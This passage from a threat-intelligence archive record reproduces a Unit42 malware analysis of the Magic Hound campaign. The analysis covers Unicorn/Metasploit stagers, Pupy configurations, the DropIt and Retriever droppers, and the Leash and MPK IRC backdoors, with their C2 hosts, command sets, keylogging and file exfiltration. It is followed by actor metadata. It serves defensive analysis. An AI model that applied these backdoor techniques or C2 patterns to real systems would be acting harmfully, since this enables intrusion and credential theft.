execute it. We found the\r\ncommand above within the source code of Magic Unicorn, which was also used in the Magic Hound delivery documents.\r\nThe shellcode executed by this command is the same as in the delivery documents as well, specifically taken from\r\nMetasploit to obtain additional shellcode to execute using an HTTP request to the following URL:\r\nhttp://www7.chrome-up[.]date/0m5EE\r\nWe are unsure of the shellcode hosted at this URL, as we were unable to coerce the C2 server to provide a payload.\r\nHowever, as alluded to above, we believe that this adversary used the open source Magic Unicorn tool to load a shellcode-based payload. The fact that the actor used Metasploit shellcode within the Unicorn-generated PowerShell script leads us to\r\nspeculate that the ultimate payload of this attack is Meterpreter, which is a shellcode-based payload.\r\nPUPY LOADER\r\nPupy comes with default loaders that run the RAT on a variety of different platforms, specifically Windows, OSX, Linux\r\nand Android. We have seen the Magic Hound actors using both the 32-bit and 64-bit DLL loaders that come with Pupy to infect\r\nWindows systems. We have gathered three samples of the default loader associated with this group and extracted the\r\nfollowing configurations:\r\nSHA256 of Sample  Configuration\r\n82779504d3fa0ffc8506ab69de9cb4d8f6415adbb11a9b8312828c539cf10190  LAUNCHER_ARGS=['--host', 'www1.chrome-up[.]date:4443', '-t', 'obfs3']\r\ndb453b8de1a01a3e4d963847c0a0a45fb7e1a9b9e6d291c8883c74019f2fc91f  LAUNCHER_ARGS=['--host', 'www1.chrome-up[.]date:4443', '-t', 'obfs3']\r\n7e57e35f8fce0efc3b944a7545736fa419e9888514fcd9e098c883b8d85e7e73  LAUNCHER_ARGS=['--host', '139.59.46[.]154:3543', '-t', 'obfs3']\r\nThese configurations show that this group uses both fully-qualified domain names and IP addresses to host their Pupy C2\r\nservers. 
Also, the configurations show the use of the “obfs3” (The Threebfuscator) transport, which is an obfuscation\r\nmethod to hide the true TCP-based communications protocol. obfs3 is used by the Tor project, and the specifics of this\r\ntransport can be found at the Tor Project.\r\nMAGICHOUND.DROPIT\r\nThe Magic Hound campaign was also discovered using a custom dropper tool, which we have named MagicHound.DropIt.\r\nThe DropIt Trojan we analyzed is an executable that builds an embedded executable by decoding embedded blobs of base64-encoded data and concatenating them together in the correct order. In all of the DropIt samples we collected, the dropper\r\nthen saves the executable to the user’s %TEMP% folder under one of the following filenames and executes it:\r\n%TEMP%\\spp.exe\r\n%TEMP%\\sloo.exe\r\n%TEMP%\\spoo.exe\r\n%TEMP%\\vschos.exe\r\nWe have also seen Magic Hound using DropIt like a binder Trojan, specifically dropping a legitimate decoy executable\r\nalong with the malicious executable as a payload. For example, we analyzed a DropIt sample (SHA256:\r\ncca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671) that dropped two executables, one of which,\r\nsaved to “%TEMP%\\flash_update.exe”, was a legitimate Flash Player installer. We believe the Magic Hound\r\ncampaign uses the DropIt Trojan to run legitimate applications that fit their social engineering, which in the example above\r\nincluded coercing the victim into updating their Flash Player.\r\nMAGICHOUND.RETRIEVER\r\nWe observed a DropIt sample installing another Trojan we call MagicHound.Retriever. At a high level, Retriever is a .NET\r\ndownloader that downloads secondary payloads from servers associated with Magic Hound. While the Trojan itself does not\r\nresemble the other Magic Hound tools, it does create a folder named \"c:\\temp\", the same folder the Magic Hound loader creates to store\r\nits persistence executable, as previously discussed. 
The folder name is quite generic and by itself is not a great correlation\r\npoint; however, coupled with the shared infrastructure, it makes a higher-fidelity connection between the two.\r\nThe Retriever Trojan uses the following namespace:\r\nusing pcchekapp.grp.ammar.samaneh;\r\nThe malware begins by creating a web service object and uses the following URL within its configuration:\r\nhttp://service.chrome-up[.]date:8080/WebService.asmx\r\nIt then calls a function called \"SetLog2\", which sets variables for the system's IP address, MAC address and hostname. A\r\npassword variable is available but unused in this sample. The code will gather some information about the system,\r\nspecifically the local IP address, MAC address, and the external IP address of the system. The code obtains the external IP\r\naddress via an HTTP request to “http://checkip.dyndns.org/” and uses a regular expression to locate an IP address in\r\nthe HTTP response.\r\nOnce these variables are set, the malware uses the SoapHttpClientProtocol class to communicate with its C2 server, which\r\nissues an HTTP POST request that appears as:\r\nAs you can see from the above request, the SoapHttpClientProtocol class neatly structures data into an HTTP POST request.\r\nAll subsequent interaction with the C2 server uses the same SOAP web service, so we will not show all of the generated\r\nHTTP requests. Instead, we will refer to the specific SOAP action (see the \"SOAPAction\" field in the previous example, specifically\r\n\"SetLog2\") that the Trojan requests from the C2 server and the response from the C2 server. 
After sending the C2 the system\r\ninformation, the malware then issues a second request for \"GetHasAnything\", which asks the C2 server\r\nwhether it has a secondary binary for the Trojan to install.\r\nIf the C2 server provides any response to the \"GetHasAnything\" request, it then calls the \"GetIdAbOne\" SOAP method to\r\nobtain what we believe is a unique identifier for the system that the Trojan will use for further interaction with the C2. After\r\nreceiving this variable, the Trojan calls the \"GetNameAbById\" method to obtain a base64 string that will be the filename written in a\r\nnewly created \"c:\\temp\" (decoded from \"YzpcdGVtcFw=\") folder. The Trojan will then call \"GetAbById\", to which the C2\r\nresponds with a base64 string containing the contents of the file to write to c:\\temp. After obtaining the unique ID from the C2 server,\r\nthe Trojan calls the \"SetAbStatById\" method to report a status of \"1\", notifying the server that it had\r\nsuccessfully received the filename and file data.\r\nWith the file written to the system, the Trojan calls the \"GetishideAbById\" SOAP action to determine whether or not the C2\r\nserver wishes to execute the newly dropped file in a hidden window. This request is followed by a call to\r\n\"GetisrunasAbById\" to determine if the Trojan should use \"runas\" to execute the downloaded executable with elevated\r\nprivileges, which would display the UAC dialog for the user to click.\r\nUnfortunately, we were unable to obtain a secondary payload from an active C2 server.\r\nMAGICHOUND.LEASH\r\nThe Magic Hound campaign was also discovered deploying an IRC Bot, which we have named MagicHound.Leash. This\r\ntool was discovered when we observed a DropIt sample installing a backdoor Trojan that used IRC for its C2\r\ncommunications. 
The bot chooses a random name from 977 hardcoded possibilities, connects to an adversary-owned IRC\r\nserver and joins a channel using the following IRC commands:\r\nUSER AS_a # # :des\r\nNICK Conroy\r\nJOIN :#kalk\r\nLeash obtains its commands via private messages (PRIVMSG) sent from the adversary, who must also be connected to the\r\nIRC server. The following commands are available:\r\nCommand SubCommand Description\r\nVER\r\nGenerates the following IRC client command that will be sent to the C2 server:\r\nPRIVMSG \u003cusername\u003e :    8 LED= 20160124\r\nKILL Trojan disconnects from the IRC server and terminates itself\r\nRESET Trojan disconnects from the IRC server and runs the executable again\r\nOS\r\nObtains the Windows version and responds to the C2 with the following message\r\n\"PRIVMSG \u003cusername\u003e :\u003cone of the following version strings\u003e\":\r\nWindows NT\r\nWindows 95\r\nWindows 98\r\nWindows ME\r\nWindows 2003\r\nWindows XP\r\nWindows 7\r\nWindows Vista\r\nUnkown os info\r\n!SH EXEC Not supported\r\nMD\r\nCreates a specified directory. The Trojan will respond to the C2 with \"PRIVMSG\r\n\u003cusername\u003e : \u003cmessage\u003e [\u003cspecified path\u003e]\". The message sent to the C2 will be \"dir\r\nis maked.\" if successful or \"dir is not maked\" if unsuccessful.\r\nMKDIR Same as MD subcommand.\r\nRD\r\nRemoves a specified directory. The Trojan will respond to the C2 with \"PRIVMSG\r\n\u003cusername\u003e : \u003cmessage\u003e [\u003cspecified path\u003e]\". The message sent to the C2 will be \"dir\r\nis removed.\" if successful or \"dir is not removed.\" if unsuccessful.\r\nDEL\r\nDeletes a specified file. The Trojan will respond to the C2 with \"PRIVMSG\r\n\u003cusername\u003e : \u003cmessage\u003e [\u003cspecified path\u003e]\". 
The message sent to the C2 will be \"file\r\nis deleted.\" if successful or \"file is not deleted.\" if unsuccessful.\r\nCOPY Not supported.\r\nMOVE Not supported.\r\nREN\r\nRenames a specified file. The Trojan will respond to the C2 with \"PRIVMSG\r\n\u003cusername\u003e : \u003cmessage\u003e [\u003cspecified path\u003e]\". The message sent to the C2 will be \"file\r\nis renamed.\" if successful or \"file is not renamed.\" if unsuccessful.\r\nDRIVE Lists the logical drives and their type, as well as the total/free space of the fixed devices.\r\nEXE\r\nCalls the GetModuleFileNameA function to obtain the path to the currently running\r\nexecutable and sends it to the C2 server.\r\n!DWN\r\nDownloads a file from a specified URL. Responds to the IRC server via PRIVMSG\r\nwith “Download  Success :FilePath=\u003cpath to downloaded file\u003e” or “Download Fail”\r\nif unsuccessful.\r\n!CMD\r\nTrojan executes a command prompt command. The Trojan will save the output of the\r\ncommand to %TEMP%\\win\u003crandom number\u003e.txt and send the contents to the C2\r\nserver or \"The length of Cmd result file is ziro!\" if the command was unsuccessful.\r\nSA\r\nGenerates the following IRC client command that will be sent to the C2 server:\r\nPRIVMSG \u003cusername\u003e : Hello ,my name is  \u003cIRC USER name\u003e, Im ready my\r\nComputer Name is:\u003ccomputer name\u003e\r\nAll of the commands, except for the VER command, must be issued by individuals in the IRC channel with nicknames that\r\nstart with \"AS_\" or \"AF_\". This suggests that the adversary’s IRC nickname would need to have these prefixes to control the\r\nsystems infected with this Trojan. 
The adversary could have used this name requirement as an added measure to make sure\r\nother individuals did not join the IRC server and begin interacting with compromised systems.\r\nMPKBot\r\nWe also found a second IRC bot called MPK (SHA256:\r\nd08d737fa59edbea4568100cf83cff7bf930087aaa640f1b4edf48eea4e07b19) that instead used as its C2 server an IP address on which a Retriever sample was hosted. This MPK IRC bot is very similar to the MPK Trojan that used a custom C2 communications\r\nprotocol, as discussed in the whitepaper by Check Point on a threat group called Rocket Kitten. We believe this\r\nversion of the MPK Trojan is based on the same code base, as both the IRC version and the one discussed in the above white\r\npaper have considerable similarities from a behavior standpoint and both Trojans share code directly.\r\nFrom a behavioral standpoint, both the IRC and custom protocol versions of MPK save \"tmp.vbs\" and \"tmp1.vbs\" to the\r\n%TEMP% folder (both differed slightly but used the same variable names within the script) in order to copy the Trojan to its\r\nfinal location and to execute it. Both variants need to be executed with the command line argument \"[2]\" to avoid\r\ncontinually attempting to copy and execute the Trojan using the “tmp.vbs” and “tmp1.vbs” files. 
The two variants of MPK\r\nshare the same registry key that the Trojan uses to automatically run each time the system starts, specifically:\r\n[HKLM and HKCU]\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\explorer\r\nBoth MPK variants include key loggers that are extremely similar in functionality in addition to having the same strings\r\nused for headers within the key log file. The MPK IRC Bot monitors active application windows and writes the title of the\r\nopen window along with the logged keystrokes to a file at “%temp%\\Save.tmp”. The MPK Trojan also monitors specifically\r\nfor windows that are likely to contain login forms for popular web-based email clients, such as titles that contain:\r\n\"Gmail -\"\r\n\"Yahoo - login\"\r\n\"Sign In -\"\r\n\"Outlook.com -\"\r\nMPK will attempt to parse these window titles to identify the associated email address and record these to the log file using\r\nthe following format:\r\n/////////////\r\nMail Find \u003cemail address\u003e\r\n///////////\r\nIf the Trojan does not find the window titles associated with Gmail, Yahoo or Outlook, it saves the title to the \"Save.tmp\"\r\nfile in the following format:\r\n+++++++++++++\r\nWindow= \u003cwindow title\u003e\r\n+++++++++++++\r\nThe major difference between the IRC variant and non-IRC variant of MPK is the C2 protocol used. The IRC variant creates\r\na mutex named “mpk1” and attempts to connect to an IRC server at 45.58.37[.]142:6667. The MPK bot generates a random\r\nlowercase name and uses it to log into the IRC server. 
It then sends the following IRC commands:\r\nNICK bxphzrjbxp\r\nUSER bxphzrjbxp bxphzrjbxp bxphzrjbxp bxphzrjbxp\r\nTo make sure it connected to the correct server, the Trojan checks for the message sent from the IRC server after the bot\r\nconnects:\r\nWelcome to the MpkNet IRC Network\r\nThe MPK bot does not join a specific IRC channel, instead sending private messages (PRIVMSG) to a user with the nick\r\n\"mpk\". After connecting to the IRC server, the MPK bot sends custom ping messages and provides an introduction via a\r\n“!Hello” message that contains the currently logged-in user of the infected host, whether the user has administrator privileges, the\r\nhostname, the UUID of the system, and the operating system version. Figure 7 shows the initial private messages sent from the\r\nMPK bot to the “mpk” account on the C2 server.\r\nFigure 7 Initial private messages sent from MPK to the IRC C2 server\r\nThe commands available within the MPK IRC bot are called via a jump table, rather than the switch statement used in the\r\ncustom protocol variant of MPK. The IRC variant of MPK has a command set (Table 2) that makes this an effective\r\nbackdoor Trojan, specifically allowing the actors to steal credentials from the targeted system via keylogging, to navigate\r\nand interact with the file system, to run arbitrary commands, and to download and execute additional tools on the system.\r\nCommand Description\r\n!Dir Lists the contents of a specified directory\r\n!Drives Enumerates the storage drives attached to the system and their respective type.\r\n!DeleteFile Deletes a specified file\r\n!NickChange\r\nChanges the nickname that the Trojan uses to log into the C2 IRC server. 
Writes it to\r\n\"nick435.tmp\" for subsequent logins.\r\n!ProcessList Lists running processes, including their PID, parent PID, executable name and priority\r\n!SendFileToServer Uploads a specified file to the C2 server\r\n!CaptureScreen Takes a screenshot that it saves to a file and uploads to the C2 server.\r\n!Hello\r\nThe Trojan introduces itself by sending the current username, whether it is an admin account or not,\r\nthe computer name, the system UUID and the OS version.\r\n!ProcessKill Terminates a process based on PID\r\n!RenameFileFolder Renames a file or folder and returns a list of the containing folder to the C2 server.\r\n!GetFileOfServer Writes a file from the C2 server to a specified file\r\n!ExecuteCommand\r\nUses the command prompt sub-process to execute commands and returns their results to the\r\nC2.\r\n!ExeCuteFile Executes a specified file using ShellExecuteA\r\n!DeleteFileFolder Deletes a file or a folder\r\n!SendkeyLogToServer Uploads the %TEMP%\\Save.tmp file to the C2 server\r\n!DeleteKeyloggerLog Deletes the %TEMP%\\Save.tmp file on the system\r\nTable 2 Commands available within MPK IRC Bot\r\nSource: https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"MISPGALAXY",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/"
	],
	"report_names": [
		"unit42-magic-hound-campaign-attacks-saudi-targets"
	],
	"threat_actors": [
		{
			"id": "d8af157e-741b-4933-bb4a-b78490951d97",
			"created_at": "2023-01-06T13:46:38.748929Z",
			"updated_at": "2026-04-10T02:00:03.087356Z",
			"deleted_at": null,
			"main_name": "APT35",
			"aliases": [
				"COBALT MIRAGE",
				"Agent Serpens",
				"Newscaster Team",
				"Magic Hound",
				"G0059",
				"Phosphorus",
				"Mint Sandstorm",
				"TunnelVision"
			],
			"source_name": "MISPGALAXY:APT35",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8e1bae2f-2a21-4ba8-a6f1-42155f96aec8",
			"created_at": "2022-10-25T16:07:23.645758Z",
			"updated_at": "2026-04-10T02:00:04.700158Z",
			"deleted_at": null,
			"main_name": "Flying Kitten",
			"aliases": [
				"Ajax Security Team",
				"Flying Kitten",
				"G0130",
				"Group 26",
				"Operation Saffron Rose"
			],
			"source_name": "ETDA:Flying Kitten",
			"tools": [
				"Stealer"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "029625d2-9734-44f9-9e10-b894b4f57f08",
			"created_at": "2023-01-06T13:46:38.364105Z",
			"updated_at": "2026-04-10T02:00:02.944092Z",
			"deleted_at": null,
			"main_name": "Charming Kitten",
			"aliases": [
				"iKittens",
				"Group 83",
				"NewsBeef",
				"G0058",
				"CharmingCypress",
				"Mint Sandstorm",
				"Parastoo"
			],
			"source_name": "MISPGALAXY:Charming Kitten",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4",
			"created_at": "2022-10-25T15:50:23.808974Z",
			"updated_at": "2026-04-10T02:00:05.291959Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"Magic Hound",
				"TA453",
				"COBALT ILLUSION",
				"Charming Kitten",
				"ITG18",
				"Phosphorus",
				"APT35",
				"Mint Sandstorm"
			],
			"source_name": "MITRE:Magic Hound",
			"tools": [
				"Impacket",
				"CharmPower",
				"FRP",
				"Mimikatz",
				"Systeminfo",
				"ipconfig",
				"netsh",
				"PowerLess",
				"Pupy",
				"DownPaper",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03",
			"created_at": "2025-08-07T02:03:24.746965Z",
			"updated_at": "2026-04-10T02:00:03.640335Z",
			"deleted_at": null,
			"main_name": "COBALT ILLUSION",
			"aliases": [
				"APT35 ",
				"APT42 ",
				"Agent Serpens Palo Alto",
				"Charming Kitten ",
				"CharmingCypress ",
				"Educated Manticore Checkpoint",
				"ITG18 ",
				"Magic Hound ",
				"Mint Sandstorm sub-group ",
				"NewsBeef ",
				"Newscaster ",
				"PHOSPHORUS sub-group ",
				"TA453 ",
				"UNC788 ",
				"Yellow Garuda "
			],
			"source_name": "Secureworks:COBALT ILLUSION",
			"tools": [
				"Browser Exploitation Framework (BeEF)",
				"MagicHound Toolset",
				"PupyRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "f4d7cba1-dbdd-42a9-88c5-4d0c81659ee0",
			"created_at": "2023-01-06T13:46:38.357581Z",
			"updated_at": "2026-04-10T02:00:02.941254Z",
			"deleted_at": null,
			"main_name": "Flying Kitten",
			"aliases": [
				"Saffron Rose",
				"AjaxSecurityTeam",
				"Ajax Security Team",
				"Group 26",
				"Sayad",
				"SaffronRose"
			],
			"source_name": "MISPGALAXY:Flying Kitten",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b0261705-df2e-4156-9839-16314250f88a",
			"created_at": "2023-01-06T13:46:38.373617Z",
			"updated_at": "2026-04-10T02:00:02.947842Z",
			"deleted_at": null,
			"main_name": "Rocket Kitten",
			"aliases": [
				"Operation Woolen-Goldfish",
				"Thamar Reservoir",
				"Timberworm",
				"TEMP.Beanie",
				"Operation Woolen Goldfish"
			],
			"source_name": "MISPGALAXY:Rocket Kitten",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f",
			"created_at": "2022-10-25T16:07:23.83826Z",
			"updated_at": "2026-04-10T02:00:04.761303Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"APT 35",
				"Agent Serpens",
				"Ballistic Bobcat",
				"Charming Kitten",
				"CharmingCypress",
				"Cobalt Illusion",
				"Cobalt Mirage",
				"Educated Manticore",
				"G0058",
				"G0059",
				"Magic Hound",
				"Mint Sandstorm",
				"Operation BadBlood",
				"Operation Sponsoring Access",
				"Operation SpoofedScholars",
				"Operation Thamar Reservoir",
				"Phosphorus",
				"TA453",
				"TEMP.Beanie",
				"Tarh Andishan",
				"Timberworm",
				"TunnelVision",
				"UNC788",
				"Yellow Garuda"
			],
			"source_name": "ETDA:Magic Hound",
			"tools": [
				"7-Zip",
				"AnvilEcho",
				"BASICSTAR",
				"CORRUPT KITTEN",
				"CWoolger",
				"CharmPower",
				"ChromeHistoryView",
				"CommandCam",
				"DistTrack",
				"DownPaper",
				"FRP",
				"Fast Reverse Proxy",
				"FireMalv",
				"Ghambar",
				"GoProxy",
				"GorjolEcho",
				"HYPERSCRAPE",
				"Havij",
				"MPK",
				"MPKBot",
				"Matryoshka",
				"Matryoshka RAT",
				"MediaPl",
				"Mimikatz",
				"MischiefTut",
				"NETWoolger",
				"NOKNOK",
				"PINEFLOWER",
				"POWERSTAR",
				"PowerLess Backdoor",
				"PsList",
				"Pupy",
				"PupyRAT",
				"SNAILPROXY",
				"Shamoon",
				"TDTESS",
				"WinRAR",
				"WoolenLogger",
				"Woolger",
				"pupy",
				"sqlmap"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e034b94b-9655-42c4-a72e-a58807dce299",
			"created_at": "2022-10-25T16:07:24.133537Z",
			"updated_at": "2026-04-10T02:00:04.876832Z",
			"deleted_at": null,
			"main_name": "Rocket Kitten",
			"aliases": [
				"Group 83",
				"NewsBeef",
				"Newscaster",
				"Operation Newscaster",
				"Operation Woolen-GoldFish",
				"Parastoo",
				"Rocket Kitten"
			],
			"source_name": "ETDA:Rocket Kitten",
			"tools": [
				"CoreImpact (Modified)",
				"FireMalv",
				"Ghole",
				"Gholee"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8faa11f5-2a14-479c-9ea8-3779e6de9749",
			"created_at": "2022-10-25T15:50:23.814205Z",
			"updated_at": "2026-04-10T02:00:05.308465Z",
			"deleted_at": null,
			"main_name": "Ajax Security Team",
			"aliases": [
				"Ajax Security Team",
				"Operation Woolen-Goldfish",
				"AjaxTM",
				"Rocket Kitten",
				"Flying Kitten",
				"Operation Saffron Rose"
			],
			"source_name": "MITRE:Ajax Security Team",
			"tools": [
				"sqlmap",
				"Havij"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434606,
	"ts_updated_at": 1775792275,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/62318114dc658c48a61870c4062fd75a860f4f62.pdf",
		"text": "https://archive.orkl.eu/62318114dc658c48a61870c4062fd75a860f4f62.txt",
		"img": "https://archive.orkl.eu/62318114dc658c48a61870c4062fd75a860f4f62.jpg"
	}
}